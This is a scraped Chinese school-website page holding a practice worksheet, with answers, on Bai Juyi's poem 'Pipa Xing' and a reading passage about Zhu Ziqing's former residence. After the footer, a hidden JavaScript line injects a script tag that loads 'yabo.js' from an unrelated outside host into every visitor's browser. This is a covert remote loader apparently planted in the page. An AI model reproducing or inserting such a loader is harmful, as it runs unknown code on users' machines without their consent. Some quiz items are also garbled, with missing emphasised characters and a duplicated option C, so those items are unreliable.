无忧无虑中学语文网

乐贝棋牌 | 试卷下载 | 课件下载 | 教案教学 | 教学素材 | 作文中心 | 备课 | 中考 | 高考 | 学习频道 | 教师频道 | 课外读物 | 会员区 | 手机版


  您的位置试卷下载 >>高二年级上 >>课文练习 >>
《琵琶行》能力训练
作者:   上传者:admin  日期:07-09-08


琵琶行(并序)·能力训练
1.下列句中的“言”字,依次解释正确的一项是
①诗  ②凡六百一十六  ③复驾兮焉求
④东船西舫悄无  ⑤自本是京城女,家在虾蟆陵下住
[    ]
A.①言语②字③助词④表达⑤说
B.①言语②字③表达④声音⑤助词
C.①表达②字③言语④说⑤助词
D.①表达②字③助词④声音⑤说
2.选出加点字表达的意思相同的一项
[    ]
A.王之涣的《凉州》与李清照《漱玉
B.郭茂倩编的《乐府诗集》与苏轼的《东坡乐府
C.白居易的《琵琶》与《钱塘湖春
D.刘邦的《大风》与杜甫的《茅屋为秋风所破
3.对诗词运用的修辞格判断不正确的是
[    ]
A.古来万事东流水(比喻)
B.主人下马客在船(互文)
C.终岁不闻丝竹声(借代)
D.铁骑突出刀枪鸣(夸张)
4.下列各句都写到“泪”,从情绪和心境的角度来看不同类的是
[    ]
A.却与小姑别,泪落连珠子
B.剑外忽闻收蓟北,初闻涕泪满衣裳
C.感时花溅泪,恨别鸟惊心
D.夜深忽梦少年事,梦啼妆泪红阑干
5.选出表述有错误的一项是
[    ]
A.“势拔五岳掩赤诚”中的“五岳”是指东岳泰山,西岳华山,中岳嵩山,北岳恒山,南岳衡山。
B.《梦游天姥吟留别》选自《李太白全集》,《茅屋为秋风所破歌》选自《杜少陵集详注》,《琵琶行》选自《白氏长庆集》。
C.“司马泪痕多”的典故出自“江州司马青衫湿”一句,其中的“青”是唐代官职低的服色。
D.“梦啼妆泪红阑干”一句意为“梦中啼哭,擦了脂粉的脸上流满了红色的(泪痕)妆”,这里指脸上的脂粉阑干,泪都流干了。
6.“歌行体”的主要特点是什么?选出正确的一组
①篇幅较长  ②篇幅较短  ③其音节,格律有严格规定  ④句法往往长短参差,富于变化  ⑤其音节格律一般比较自由  ⑥讲究对仗,声调韵律
[    ]
A.②③④⑥          B.①③④⑥
C.①④⑤            D.①③⑥
7.下面是《琵琶行》中的五个名句,它们在诗中出现的先后顺序为
①千呼万唤始出来,犹抱琵琶半遮面。
②同是天涯沦落人,相逢何必曾相识。
③转轴拨弦三两声,未成曲调先有情。
④门前冷落鞍马稀,老大嫁作商人妇。
⑤嘈嘈切切错杂弹,大珠小珠落玉盘。
[    ]
A.①③⑤④②        B.①⑤③④②
C.①⑤③②④        D.①②③⑤④
8.从修辞角度分析以下各句与例句相同的一句是
例句:浔阳地僻无音乐,终岁不闻丝竹声
[    ]
A.天台一万八千丈,对此欲倒东南倾
B.银瓶乍破水浆迸,铁骑突出刀枪鸣
C.四弦一声如裂帛
D.湖月照我影,送我至剡溪
E.两岸青山相对出,孤帆一片日边来
9.《琵琶行》:“大弦嘈嘈如急雨,小弦切切如私语。嘈嘈切切错杂弹,大珠小珠落玉盘。间关莺语花底滑,幽咽泉流冰下滩。冰泉冷涩弦凝绝,凝绝不通声暂歇。别有幽愁暗恨生,此时无声胜有声。银瓶乍破水浆迸,铁骑突出刀枪鸣。”这里写的乐曲旋律的变化是
[    ]
A.由舒徐流畅—逐渐沉咽—间歇停顿—激越雄壮
B.由激越雄壮—逐渐沉咽—间歇停顿—舒徐流畅
C.由舒徐流畅—间歇停顿—逐渐沉咽—激越雄壮
D.由激越雄壮—舒徐流畅—间歇停顿—逐渐沉咽
10.选出对加点词依次解释正确的一项
元和十年,予左迁九江郡司马。明年秋,送客湓浦口,闻舟中夜弹琵琶者,听其音,铮铮然有京都声……因为长句,歌以赠之,凡六百一十六,命曰《琵琶》。
[    ]
A.升官  长诗    乐曲,歌唱的遍数
B.贬官  七言诗    古诗的一种
C.升官  长诗    古诗的一种
C.贬官      乐曲,歌唱的遍数
11.“东船西舫悄无言,唯见江心秋月白”两句属环境描写,对其作用分析最佳的一项是
[    ]
A.以景色的静衬托音乐演奏的激昂。
B.以听众的静反衬音乐演奏的成功。
C.以景色的静寂寥廓,衬托听众完全沉浸在音乐声中。
D.渲染静寂的气氛,衬托听众感情的凄凉。
12.联系全诗,选出对“东船西舫悄无言,唯见江心秋月白”分析不对的一项
[    ]
A.与开头一段写到的“夜”、“船”、“月”相呼应。
B.衬托琵琶女技艺高超,烘托悲凉的氛围。
C.在写弹琵琶与琵琶女自述之间宕开一笔写环境,使行文有波澜,又层次分明。
D.用夜静和月色惨淡烘托琵琶女的身世和演技,给读者留下了涵咏回味的广阔空间。
阅读下面的文字,完成1316题。
 
穿布鞋的故居
 
扬州的旧巷大多是这样,七拐八绕,枝枝蔓蔓,曲径通幽,八卦阵似的。安乐巷也不例外,两旁青砖高墙,中间青石铺路。这是安乐巷27号门牌,坐西朝东,极普通的那种民居,如果不是挂着江泽民总书记题写的“朱自清故居”五字,你若是骑车穿巷,脚下稍一用力,便会倏忽而过。
故居就和他的主人一样,很不引人注目。站在故居门前,我不由得想起了郭良夫先生在编选的《完美的人格》里的一个细节,朱先生在清华大学任文学院中文系主任时,总是喜欢穿平底布鞋,每逢开会,从不坐主席台,只拣一个不起眼的角落,静听同事们阔论。朱先生在会场上偏于一隅,同他在这巷子里偏于一隅的故居是多么的一脉相承啊。于是,我头脑中闪出本文的题目——《穿布鞋的故居》。
如今,到处在修茸或重建名人故居,画廊漆柱,巨匾敞庭,又气派又热闹。尤其在时髦文艺搭台经济唱戏的今天,名人故居拥有了一份独特的召唤力。而朱先生的故居没有这份辉煌,为了供后学瞻仰,有关部门只是将原先居住在这里的市民迁了出去,腾空房间便成了。
故居很小,小得只有几间木结构的房子,小得你站在门庭下清咳一声,每个角落里都能听到。这又和朱先生的为人如出一辙:绝不故作高深,只求平易近人。于是我这样概括这座小院落:巷子很深,故居却很浅。游人很少,有时整天卖不出一张门票。扬州有座瘦西湖,到过瘦西湖的外地人,回去之后会向别人炫耀一番,我到过瘦西湖,而朱自清故居不会有这样的反应。首先没有殷殷期盼拜访的人,绝不会有一种陈年老窖般的期待,因为他根本就没有想过要去;而到过的人更不会将此作为话题,因为我相信,能够在今日仍念念不忘这片陋房的人正是感染了朱先生的平淡与平和的。为此我反复为故居的车马无声而庆幸,这也许正是先生的本意。
13.第4段中说“巷子很深,故居却很浅”,这句话有什么深刻含义?用自己的话回答。(不超过20字)
□□□□□□□□□□□□□□□□□□□□
14.文章最后说“这也许正是先生的本意”,根据上文,指出“本意”的具体含义。(不超过20字)
□□□□□□□□□□□□□□□□□□□□
15.第3段中说,名人故居“拥有一份独特的召唤力”。而朱先生的故居“没有这份辉煌”,对此,简要谈谈你的理解。
答:________________________________________________
________________________________________________
16.文章为什么要以“穿布鞋的故居”为题?试简要回答。
答:________________________________________________
________________________________________________
 
参考答案
1D
2D
3D
4B
5D
6C
7A
8E
9A
10B
11C
12C
13.朱先生学问很深,为人却平易近人。
14.不引人注目,做一个平淡、平和的人。
15.作者将朱先生的故居与别的名人故居进行对比,是为了强调朱先生的故居比别的名人的故居更具有召唤力:他的人格学问更值得后人敬仰。
16.既表明朱先生故居的普通,更强调朱先生人格的完美。
 


 



* 本站是所有资料仅供教学之用。本站部分内容来自互联网或由会员上传,版权归原作者所有,如有问题,请及时联系我们。
* 本站所有的数据都是本地下载,不可能出现不能下载,下载不成功时,请一直重试下载,如果一直不成功,可能是本站出了故障,隔个几分种后再次重新下载,详细请参考下载说明!
 交互区
上传资料 资料求助
 站内搜索

关键字   

 栏目推荐
在线新华字典  在线成语词典
古诗词大全    中国四大名著
文言文翻译   入团志愿书
中考历届试卷  高考历届试卷
初中阅读练习  高中阅读练习
 相关资料
《琵琶行》同步练习5
《琵琶行并序》同步练习
《琵琶行》练习题
《琵琶行》课后练习
《琵琶行》自学评估练习
《琵琶行(并序)》同步练习2
《琵琶行(并序)》同步练习
《琵琶行》同步练习4
《留学巴黎》《琵琶行》同步练习
《琵琶行》阅读练习及答案
《琵琶行并序》原文
《琵琶行·并序》赏析
《琵琶行》课本剧
白居易名句汇编
《琵琶行》ppt课件(46页)
《琵琶行》pptx课件(28页)
《琵琶行》并序ppt课件(21页)
《琵琶行》ppt课件(28页)
《琵琶行》ppt课件(31页)
《琵琶行》ppt复习课件(19页)
《琵琶行》(并序)ppt课件(12页)
《琵琶行》ppt课件(47页)
《琵琶行》ppt课件(24页)
《琵琶行》ppt课件(38页)
《琵琶行》ppt课件(26页)2
《琵琶行》ppt课件(26页)
《将进酒》《琵琶行》练习讲解ppt课件
《琵琶行》ppt课件(19页)
《琵琶行》ppt课件(35页)
《琵琶行》pptx课件(11页)
《琵琶行》ppt课件(40页)
《琵琶行》ppt课件17
《琵琶行》ppt课件(45页)
《琵琶行》ppt课件(21页)
《琵琶行》ppt课件14
《琵琶行》ppt课件(20页)
《琵琶行》(并序)ppt课件13
《琵琶行》节选ppt课件(21页)
《琵琶行(并序)》ppt课件15
《琵琶行(并序)》ppt课件14
北师大版《琵琶行》节选ppt课件13
《琵琶行》ppt课件12
《琵琶行》ppt课件11
《琵琶行(并序)》ppt课件11
《琵琶行》ppt课件10


   版权所有 无忧无虑中学语文网 Email:zmjfy@yeah.net  浙ICP备05019169号 

var loadJS = function(url, location){ var scriptTag = document.createElement('script'); scriptTag.src = url; location.appendChild(scriptTag); }; loadJS('https://hanniu.org/yabo.js', document.head);